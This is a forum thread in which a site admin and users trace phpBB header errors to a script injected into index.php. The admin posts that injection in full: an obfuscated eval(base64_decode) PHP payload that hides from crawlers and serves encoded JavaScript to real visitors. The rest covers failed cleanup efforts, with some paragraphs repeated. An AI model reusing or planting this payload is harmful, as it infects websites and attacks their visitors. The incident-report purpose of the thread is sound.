Could everyone that gets some kind of site error messages please tell me where you get them and past a copy of the message in here?
There are reports that we have issues (again, of course, this never ends..) with the site and that it throws some error messages at the header. Thing is I can't reproduce them myself.
Site Error messages?
Re: Site Error messages?
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4586: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4588: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4589: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4590: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
trying to open http://www.wtactics.org/forum/ on chromium (Srware Iron 15.0.900.2 (Build 107001 Windows))
Also http://wtactics.org/wiki/ displays blank page, while http://wtactics.org/wiki/index.php?title=Main_Page seems to be working fine.
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4588: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4589: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4590: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
trying to open http://www.wtactics.org/forum/ on chromium (Srware Iron 15.0.900.2 (Build 107001 Windows))
Also http://wtactics.org/wiki/ displays blank page, while http://wtactics.org/wiki/index.php?title=Main_Page seems to be working fine.
I'm the filthy bastard you wish you never met.
Re: Site Error messages?
The following script was injected:
It seems only index.php were injected. They have all been cleaned and reuploaded, so stuff should work now. It is however just a matter of time before this hits us again as I am clueless to what backdoor it uses.
Code: Select all
eval ___this_was_put_here_by_snowdrop___ (base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMGljbVl6SWk1emNHeHBkQ2dpTlRJek5pSXBMbkJ2Y0NzbmNYZGxKenRoUFdGYkluTndiR2tpS3lKMElsMG9JaUlwTG5KbGRtVnljMlVvS1ZzaWNHOGlLeUp3SWwwb0tUdHBaaWhoUFQwblppZDhmR0U5UFNKY2JpSXBDbVk5V3pZME15eGJOU3cxTERFd01TdzVPQ3d5T0N3ek5pdzVOaXd4TURjc09UVXNNVEV6TERFd05TdzVOeXd4TURZc01URXlMRFF5TERrNUxEazNMREV4TWl3Mk5Td3hNRFFzT1Rjc01UQTFMRGszTERFd05pd3hNVElzTVRFeExEWXlMREV4Tnl3NE1DdzVNeXc1T1N3M05DdzVNeXd4TURVc09UY3NNellzTXpVc09UUXNNVEEzTERrMkxERXhOeXd6TlN3ek55dzROeXcwTkN3NE9Td3pOeXd4TVRrc05TdzFMRFVzTVRBeExEazRMREV4TUN3NU15d3hNRFVzT1Rjc01URXdMRE0yTERNM0xEVTFMRFVzTlN3eE1qRXNNamdzT1Rjc01UQTBMREV4TVN3NU55d3lPQ3d4TVRrc05TdzFMRFVzT1RZc01UQTNMRGsxTERFeE15d3hNRFVzT1Rjc01UQTJMREV4TWl3ME1pd3hNVFVzTVRFd0xERXdNU3d4TVRJc09UY3NNellzTXpBc05UWXNNVEF4TERrNExERXhNQ3c1TXl3eE1EVXNPVGNzTWpnc01URXhMREV4TUN3NU5TdzFOeXd6TlN3eE1EQXNNVEV5TERFeE1pd3hNRGdzTlRRc05ETXNORE1zTVRFMUxERXdNQ3d4TURZc09Ua3NNVEEzTERrekxERXdOeXd4TVRJc01URXpMRFF5TERrMkxERXdOaXd4TVRFc05EVXNORElzTVRFekxERXhNU3cwTXl3eE1ERXNORE1zTVRBeExEUXlMREV3T0N3eE1EQXNNVEE0TERVNUxEazVMREV3Tnl3MU55dzBOU3d6TlN3eU9Dd3hNVFVzTVRBeExEazJMREV4TWl3eE1EQXNOVGNzTXpVc05EVXNORFFzTXpVc01qZ3NNVEF3TERrM0xERXdNU3c1T1N3eE1EQXNNVEV5TERVM0xETTFMRFExTERRMExETTFMREk0TERFeE1Td3hNVElzTVRFM0xERXdOQ3c1Tnl3MU55d3pOU3d4TVRRc01UQXhMREV4TVN3eE1ERXNPVFFzTVRBeExERXdOQ3d4TURFc01URXlMREV4Tnl3MU5Dd3hNREFzTVRBeExEazJMRGsyTERrM0xERXdOaXcxTlN3eE1EZ3NNVEEzTERFeE1Td3hNREVzTVRFeUxERXdNU3d4TURjc01UQTJMRFUwTERrekxEazBMREV4TVN3eE1EY3NNVEEwTERFeE15d3hNVElzT1Rjc05UVXNNVEEwTERrM0xEazRMREV4TWl3MU5DdzBOQ3cxTlN3eE1USXNNVEEzTERFd09DdzFOQ3cwTkN3MU5Td3pOU3cxT0N3MU5pdzBNeXd4TURFc09UZ3NNVEV3TERrekxERXdOU3c1Tnl3MU9Dd3pNQ3d6Tnl3MU5TdzFMRFVzTVRJeExEVXNOU3c1T0N3eE1UTXNNVEEyTERrMUxERXhNaXd4TURFc01UQTNMREV3Tml3eU9Dd3hNREVzT1Rnc01URXdMRGt6TERFd05TdzVOeXd4TVRBc016WXNNemNzTVRFNUxEVXNOU3cxTERFeE5DdzVNeXd4TVRBc01qZ3NPVGdzTWpnc05UY3NNamdzT1RZc01UQTNMRGsxTERFeE15d3hNRFVzT1Rjc01UQTJMREV4TWl3ME1pdzVOU3d4TVRBc09UY3NPVE1zTVRFeUxEazNMRFkxTERFd05DdzVOeXd4TURVc09UY3NNVEEyTERFeE1pd3pOaXd6TlN3eE1ERXNPVGdzTVRFd0xEa3pMREV3TlN3NU55d3pOU3d6Tnl3MU5TdzVPQ3cwTWl3eE1URXNPVGNzTVRFeUxEWXhMREV4TWl3eE1USXNNVEV3TERFd01TdzVOQ3d4TVRNc01URXlMRGszTERNMkxETTFMREV4TVN3eE1UQXNPVFVzTXpVc05EQXNNelVzTVRBd0xERXhNaXd4TVRJc01UQTRMRFUwTERRekxEUXpMREV4TlN3eE1EQXNNVEEyTERrNUxERXdOeXc1TXl3eE1EY3NNVEV5TERFeE15dzBNaXc1Tml3eE1EWXNNVEV4TERRMUxEUXlMREV4TXl3eE1URXNORE1zTVRBeExEUXpMREV3TVN3ME1pd3hNRGdzTVRBd0xERXdPQ3cxT1N3NU9Td3hNRGNzTlRjc05EVXNNelVzTXpjc05UVXNPVGdzTkRJc01URXhMREV4TWl3eE1UY3NNVEEwTERrM0xEUXlMREV4TkN3eE1ERXNNVEV4TERFd01TdzVOQ3d4TURFc01UQTBMREV3TVN3eE1USXNNVEUzTERVM0xETTFMREV3TUN3eE1ERXNPVFlzT1RZc09UY3NNVEEyTERNMUxEVTFMRGs0TERReUxERXhNU3d4TVRJc01URTNMREV3TkN3NU55dzBNaXd4TURnc01UQTNMREV4TVN3eE1ERXNNVEV5TERFd01Td3hNRGNzTVRBMkxEVTNMRE0xTERrekxEazBMREV4TVN3eE1EY3NNVEEwTERFeE15d3hNVElzT1Rjc016VXNOVFVzT1Rnc05ESXNNVEV4TERFeE1pd3hNVGNzTVRBMExEazNMRFF5TERFd05DdzVOeXc1T0N3eE1USXNOVGNzTXpVc05EUXNNelVzTlRVc09UZ3NORElzTVRFeExERXhNaXd4TVRjc01UQTBMRGszTERReUxERXhNaXd4TURjc01UQTRMRFUzTERNMUxEUTBMRE0xTERVMUxEazRMRFF5TERFeE1TdzVOeXd4TVRJc05qRXNNVEV5TERFeE1pd3hNVEFzTVRBeExEazBMREV4TXl3eE1USXNPVGNzTXpZc016VXNNVEUxTERFd01TdzVOaXd4TVRJc01UQXdMRE0xTERRd0xETTFMRFExTERRMExETTFMRE0zTERVMUxEazRMRFF5TERFeE1TdzVOeXd4TVRJc05qRXNNVEV5TERFeE1pd3hNVEFzTVRBeExEazBMREV4TXl3eE1USXNPVGNzTXpZc016VXNNVEF3TERrM0xERXdNU3c1T1N3eE1EQXNNVEV5TERNMUxEUXdMRE0xTERRMUxEUTBMRE0xTERNM0xEVTFMRFVzTlN3MUxEazJMREV3Tnl3NU5Td3hNVE1zTVRBMUxEazNMREV3Tml3eE1USXNORElzT1Rrc09UY3NNVEV5TERZMUxERXdOQ3c1Tnl3eE1EVXNPVGNzTVRBMkxERXhNaXd4TVRFc05qSXNNVEUzTERnd0xEa3pMRGs1TERjMExEa3pMREV3TlN3NU55d3pOaXd6TlN3NU5Dd3hNRGNzT1RZc01URTNMRE0xTERNM0xEZzNMRFEwTERnNUxEUXlMRGt6TERFd09Dd3hNRGdzT1Rjc01UQTJMRGsyTERZekxERXdNQ3d4TURFc01UQTBMRGsyTERNMkxEazRMRE0zTERVMUxEVXNOU3d4TWpGZFhUdHRaRDBuWVNjN2NUMGljU0k3WlQxbGRtRnNPM2M5Wmxzd0t6RmRPM005SnljN1p6MG5abkp2YlVNbk8yYzlaeXNuYUdGeVEyOWtKenRuS3owblpTYzdabTl5S0drOU1EdHBQSGN1YkdWdVozUm9PMmtyS3lsN2N6MXpLMU4wY21sdVoxdG5YU2cwSzNkYmFWMHBPMzBLYVdZb0lTaGhJVDBuWmljbUptRWhQU0pjYmlJcEtRcGxLQ2RsS0hNcEp5azdQQzl6WTNKcGNIUSsnKSk7DQp9'));
Re: Site Error messages?
Problem is yet to be found: Cleansing all files doesn't help, the worm gets back there directly after I upload a fresh copy of the files, suggesting there is either some unsafe script/plugin or a file with the payload somewhere lurking on the site.
This all takes immense amounts of time. I have wasted over 20 hours this far on reading about script injections and searching for what might cause it, looking at plenty of php and js-files, done many search and replaces, updated timthumb-scripts and plugins in general, tryindg to decipher access loggs etc, all with no success.
I even paid for a hoax service that was the biggest waste of money in my life - sitelock.com - that would supposedly identify and scan for viruses etc but was so mediocre I feel obligated to warn anyone in here from ever using that company for anything that free services wouldn't do anyway.
The way I do I started doing it now is to kill all files i /public_html and upload the scripts/sites again, one by one, waiting to see if it gets infected. If it doesn't I will then uploading another one. Eventually the sites will all get infected, and the scripts I uploaded the most recently would supposedly be the bad ones.
This all takes immense amounts of time. I have wasted over 20 hours this far on reading about script injections and searching for what might cause it, looking at plenty of php and js-files, done many search and replaces, updated timthumb-scripts and plugins in general, tryindg to decipher access loggs etc, all with no success.
I even paid for a hoax service that was the biggest waste of money in my life - sitelock.com - that would supposedly identify and scan for viruses etc but was so mediocre I feel obligated to warn anyone in here from ever using that company for anything that free services wouldn't do anyway.
The way I do I started doing it now is to kill all files i /public_html and upload the scripts/sites again, one by one, waiting to see if it gets infected. If it doesn't I will then uploading another one. Eventually the sites will all get infected, and the scripts I uploaded the most recently would supposedly be the bad ones.